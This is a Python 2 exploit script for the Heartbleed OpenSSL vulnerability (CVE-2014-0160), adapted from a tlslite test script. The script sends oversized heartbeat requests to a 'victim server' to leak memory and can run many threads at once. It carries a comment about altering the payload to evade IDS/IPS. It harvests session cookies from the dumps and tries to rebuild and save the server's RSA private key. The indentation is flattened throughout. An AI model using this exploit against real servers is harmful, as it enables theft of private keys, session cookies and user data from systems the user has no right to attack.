#!/usr/bin/env python2
\'\'\'
CVE-2014-0160 - Heartbleed OpenSSL Heartbeat vulnerability
This piece of code is modified from the work of Mothran (https://github.com/mothran/tlslite).
He releases a testing code for Heartbleed vulnerability at https://github.com/mothran/tlslite/blob/master/scripts/heartbleed.py.
To run this code, you need to install tlslite from this github and you should use this edition only as other version will not work.
You also need to install python-m2crypto, python-pycryptopp and python-gmpy.
Modified by : Samiux
Blog : http://samiux.blogspot.com
http://samiux.blogspot.com/2014/04/exploit-dev-heartbleed-cve-2014-0160_17.html
Date : April 20, 2014
Version : 0.8
Change log : 0.1 - First release (April 16, 2014)
0.2 - Threading added, Minor improvement and bug fixes (April 16, 2014)
0.3 - Minor bug fixes (April 17, 2014)
0.4 - Fix calculation of private key bug, Minor improvement (April 17, 2014)
0.5 - Fix private key calculation bug, Minor improvement (April 18, 2014)
0.6 - Minor improvement (April 18, 2014)
0.7 - Bug fix and more improvement (April 18, 2014)
0.8 - Add read dump file offline (April 20, 2014)
Known issue : - The script is for online testing and slow speed is expected. However, it will minimize the loading of the victim
server.
- If the number of thread is too high, the victim server will refuse the connection. The limitation is not the power
of your attacking machine. It is a limitation of the ability of the victim server. In general situation, if the number
of thread is higher than 40, the victim server will refuse the connection.
- When the script quit unexpectly (with error messages) with the first try on the unknown server, the server may not support
SSL or not vulnerable to this bug.
Unknown factor : Since I have no time to test the Private Key recap function (or say I cannot capture the private key in my personal lab),
I am not sure if it is working or not. Anyone can inform me the result is appreciated. I can be reached
at http://www.infosec-ninjas.com/contact.
May be Apache with vulnerable OpenSSL will not leak SSL Private key. However, Cloudflare (Ngnix with OpenSSL) will.
Personal Lab : Victim - Ubuntu Server 12.04.4 LTS x88 (without (auto) update/upgrade), LAMP on Virtualbox with 96MB RAM in vm
Attacker - Kali Linux 1.0.6 x86_64 on MacBook Air (Mid 2013) dual boot
I follow this link (https://www.digitalocean.com/community/articles/how-to-create-a-ssl-certificate-on-apache-for-ubuntu-12-04)
to setup SSL key on Apache.
\'\'\'
# standard library
import socket, sys, time, re
import os.path
# threading and Queue library
import threading
# base64 and gmpy library
import base64, gmpy
# pyasn1 library
from pyasn1.codec.der import encoder
from pyasn1.type.univ import *
# optparse library
from optparse import OptionParser
# tlslite library
from tlslite.api import *
from tlslite.messages import *
from tlslite import __version__
# Menu and options
options = OptionParser(usage=\'time python %prog server [options]\', description=\'Test for OpenSSL heartbeat vulnerability (CVE-2014-0160)\')
options.add_option(\'-p\', \'--port\', type=\'int\', default=443, help=\'TCP port to test (default: 443)\')
options.add_option(\'-d\', \'--dump\', type=\'int\', default=1, help=\'Number of dump per request, standard is 16K per dump (default: 1)\')
options.add_option(\'-k\', \'--key\', action=\'store_true\', default=False, help="Attempt to obtain the server\'s SSL Private key")
options.add_option(\'-r\', \'--request\', type=\'int\', default=1, help=\'Number of requests (default: 1)\')
options.add_option(\'-c\', \'--cookie\', type=\'str\', default=\'\', help="Cookie or session to look for (default: NULL, e.g. -c \'Cookie:\')")
options.add_option(\'-w\', \'--write\', action=\'store_true\', default=False, help=\'Write data to be dumped to file (default: False) (write to ~/dumpwrite.bin)\')
options.add_option(\'-a\', \'--append\', action=\'store_true\', default=False, help=\'Append data to be dumped to file (default: False) (append to ~/dumpappend.bin)\')
options.add_option(\'-n\', \'--name\', type=\'str\', default="", help=\'Server name extension, e.g. -n "/page/index.php" (default: NULL)\')
options.add_option(\'-t\', \'--thread\', type=\'int\', default=1, help=\'Number of threads for the requests (default: 1, best range 1-40)\')
options.add_option(\'-q\', \'--quiet\', action=\'store_true\', default=False, help=\'Do not display the output on screen (default: False)\')
options.add_option(\'-o\', \'--offline\', action=\'store_true\', default=False, help=\'Read the dump file offline (default: False)\')
opts, args = options.parse_args()
if len(args) < 1 or len(sys.argv[1]) == 0:
options.print_help()
sys.exit()
# for server and port
port = opts.port
address = (sys.argv[1], int(port))
# args assignment
servername = opts.name
numb = opts.dump
num_loop = opts.request
num_thread = opts.thread
find_priv_key = opts.key
find_base = opts.write
find_append = opts.append
cookie_val = opts.cookie
if opts.cookie == "":
find_cookie = False
else:
find_cookie = True
# read the dump file offline
def read_offline():
# option -c (--cookie)
if find_cookie:
resp = ""
if os.path.exists( "dumpwrite.bin" ):
infile = "dumpwrite.bin"
elif os.path.exists( "dumpappend.bin" ):
infile = "dumpappend.bin"
elif os.path.exists( "dumpwrite.bin" ) and os.path.exists( "dumpappend.bin" ):
infile = "dumpappend.bin"
else:
print("Dump file not exists, quit!")
sys.exit(-1)
print("Processing .....")
print("Result will be saved to ~/dumpsave.txt")
filesize = os.path.getsize( infile )
filesize = filesize / 16384
with open( infile, "r+b" ) as fd:
resp = fd.read(16384)
with open( "dumpsave.txt", "a" ) as f:
while resp:
# This is dirt and needs to be cleaned up.
cookies = [m.start() for m in re.finditer(cookie_val, resp)]
for start in cookies:
stop = resp[start:].find("\\n")
#if opts.quiet == False:
# print resp[start: stop]
data = resp[start: stop]+"\\n"
f.write(data)
resp = fd.read(16384)
f.close()
fd.close()
# option -k (--key)
if find_priv_key:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect(address)
connection = TLSConnection(sock)
settings = HandshakeSettings()
settings.heart_beat = True
try:
start = time.clock()
connection.handshakeClientCert(None, None, settings=settings, serverName=servername)
stop = time.clock()
except TLSLocalAlert as a:
if a.description == AlertDescription.user_canceled:
print(str(a))
else:
raise
sys.exit(-1)
except TLSRemoteAlert as a:
if a.description == AlertDescription.unknown_psk_identity:
if username:
print("Unknown username")
else:
raise
elif a.description == AlertDescription.bad_record_mac:
if username:
print("Bad username or password")
else:
raise
elif a.description == AlertDescription.handshake_failure:
print("Unable to negotiate mutually acceptable parameters")
else:
raise
sys.exit(-1)
if connection.session.serverCertChain:
pubkey = connection.session.serverCertChain.x509List[0].publicKey
if opts.quiet == False:
print("n = %s, e = %s" % (pubkey.n, pubkey.e))
n = pubkey.n
e = pubkey.e
num_pubkey_bits = numBits(pubkey.n)
if opts.quiet == False:
print("pubkey_bits = %i" % num_pubkey_bits)
prime_len_bytes = (num_pubkey_bits + 15) // 16
if opts.quiet == False:
print("Public key obtained.")
else:
print("We don\'t have a public key to factor, bailing.")
sys.exit(-1)
connection.close()
resp = ""
if os.path.exists( "dumpwrite.bin" ):
infile = "dumpwrite.bin"
elif os.path.exists( "dumpappend.bin" ):
infile = "dumpappend.bin"
elif os.path.exists( "dumpwrite.bin" ) and os.path.exists( "dumpappend.bin" ):
infile = "dumpappend.bin"
else:
print("Dump file not exists, quit!")
sys.exit(-1)
print("Processing .....")
filesize = os.path.getsize( infile )
filesize = filesize / 16384
with open( infile, "r+b" ) as fd:
resp = fd.read(16384)
resp = bytearray(resp)
counter=1
while resp:
print("Processing %d of %d (trunk of 16384 bytes) ..." % (counter, filesize))
for i in range(0, len(resp)-prime_len_bytes):
# reverse the bytes, only works for little-endian
# targets (FIXME? Probably not worth it, would have
# to guess word length on big-endian.)
data = resp[i+prime_len_bytes:i:-1]
data = bytesToNumber(data)
#if data > 1 and pubkey != None:
if data > 1 and pubkey != None and (pubkey.n % data) == 0:
print("Success! p = %i, q = %i" % (data, pubkey.n//data))
# calculation
p = data
q = pubkey.n//data
#e = 65537
#q = n / p
phi = (p - 1) * (q - 1)
d = gmpy.invert (e, phi)
dp = d % (p - 1)
dq = d % (q - 1)
qinv = gmpy.invert (q, p)
seq = Sequence()
# build SSL private key
for x in [0, n, e, d, p, q, dp, dq, qinv]:
seq.setComponentByPosition (len (seq), Integer (x))
priv_key = ("\\n\\n-----BEGIN RSA PRIVATE KEY-----\\n%s-----END RSA PRIVATE KEY-----\\n\\n" % base64.encodestring(encoder.encode (seq)))
# print the private key to screen
print priv_key
# save the private key
fd = open( "private_key.pem", "w")
fd.write(priv_key)
fd.flush()
fd.close()
resp = fd.read(16384)
resp = bytearray(resp)
counter=counter+1
fd.close()
print("Private key not found :(")
# Main loop
def main_loop(z):
for x in range(0, num_loop):
# check for key found flag
if os.path.exists("/tmp/key_found"):
print("Private key has been found, no more process!")
connection.close()
sys.exit(0)
if num_thread > 1:
print ("Thread : %i of %i, Request : %i of %i" %(z, num_thread, x, num_loop))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect(address)
connection = TLSConnection(sock)
settings = HandshakeSettings()
settings.heart_beat = True
try:
start = time.clock()
connection.handshakeClientCert(None, None, settings=settings, serverName=servername)
stop = time.clock()
except TLSLocalAlert as a:
if a.description == AlertDescription.user_canceled:
print(str(a))
else:
raise
sys.exit(-1)
except TLSRemoteAlert as a:
if a.description == AlertDescription.unknown_psk_identity:
if username:
print("Unknown username")
else:
raise
elif a.description == AlertDescription.bad_record_mac:
if username:
print("Bad username or password")
else:
raise
elif a.description == AlertDescription.handshake_failure:
print("Unable to negotiate mutually acceptable parameters")
else:
raise
sys.exit(-1)
# --key (-k) is true
if find_priv_key:
if connection.session.serverCertChain:
pubkey = connection.session.serverCertChain.x509List[0].publicKey
if opts.quiet == False:
print("n = %s, e = %s" % (pubkey.n, pubkey.e))
n = pubkey.n
e = pubkey.e
num_pubkey_bits = numBits(pubkey.n)
if opts.quiet == False:
print("pubkey_bits = %i" % num_pubkey_bits)
prime_len_bytes = (num_pubkey_bits + 15) // 16
if opts.quiet == False:
print("Public key obtained.")
else:
print("We don\'t have a public key to factor, bailing.")
sys.exit(-1)
# printGoodConnection(connection, stop-start)
# change the value of paylaod to prevent the IDS/IPS
heartbeat = HeartBeat()
heartbeat.create(type=1,
pay_len=0xffff,
payload="AA")
# up the range numbs to get more memory, sometimes it repeats.
resp = ""
for x in range(0, numb):
for result in connection._sendMsg(heartbeat):
pass
resp = resp + connection.readPOC(0xffff)
# option -w (--write)
if find_base:
fd = open( "dumpwrite.bin", "w+b")
fd.write(resp)
fd.flush()
fd.close()
# option -a (--append)
if find_append:
fd = open( "dumpappend.bin", "a+b")
fd.write(resp)
fd.flush()
fd.close()
# option -k (--key) <--- this feature is not well tested, please let me know the result.
if find_priv_key:
resp = bytearray(resp)
for i in range(0, len(resp)-prime_len_bytes):
# reverse the bytes, only works for little-endian
# targets (FIXME? Probably not worth it, would have
# to guess word length on big-endian.)
data = resp[i+prime_len_bytes:i:-1]
data = bytesToNumber(data)
#if data > 1 and pubkey != None:
if data > 1 and pubkey != None and (pubkey.n % data) == 0:
print("Success! Thread = %i, p = %i, q = %i" % (z, data, pubkey.n//data))
# save the dump
fd = open( "dumpfinal.bin", "w+b" )
fd.write(resp)
fd.flush()
fd.close()
# calculation
p = data
q = pubkey.n//data
#e = 65537
#q = n / p
phi = (p - 1) * (q - 1)
d = gmpy.invert (e, phi)
dp = d % (p - 1)
dq = d % (q - 1)
qinv = gmpy.invert (q, p)
seq = Sequence()
# build SSL private key
for x in [0, n, e, d, p, q, dp, dq, qinv]:
seq.setComponentByPosition (len (seq), Integer (x))
priv_key = ("\\n\\n-----BEGIN RSA PRIVATE KEY-----\\n%s-----END RSA PRIVATE KEY-----\\n\\n" % base64.encodestring(encoder.encode (seq)))
# print the private key to screen
print priv_key
# save the private key
fd = open( "private_key.pem", "w")
fd.write(priv_key)
fd.flush()
fd.close()
# set the key found flag
key_found = "Private key is found!"
fd = open( "/tmp/key_found", "w")
fd.write(key_found)
fd.flush()
fd.close()
connection.close()
sys.exit(0)
# option -c (--cookie)
if find_cookie:
# This is dirt and needs to be cleaned up.
cookies = [m.start() for m in re.finditer(cookie_val, resp)]
for start in cookies:
stop = resp[start:].find("\\n")
print resp[start: stop]
# to print the dump on screen or not
if opts.quiet == False:
if opts.write == False and opts.append == False:
if opts.key == False:
if find_cookie == False:
print resp
# pause for 0.1 seconds in order to reduce the chance of dulplicate the content of the memory dump
if opts.request > 1:
time.sleep(.1)
# close the connection
connection.close()
if __name__ == \'__main__\':
# reset the key found flag
if os.path.exists("/tmp/key_found"):
os.remove("/tmp/key_found")
if opts.offline == True:
read_offline()
else:
# multi-threading or not
if num_thread > 1:
thread_list = []
for i in range(num_thread):
t = threading.Thread(target=main_loop, args=(i,))
thread_list.append(t)
for thread in thread_list:
thread.start()
for thread in thread_list:
thread.join()
else:
main_loop(1)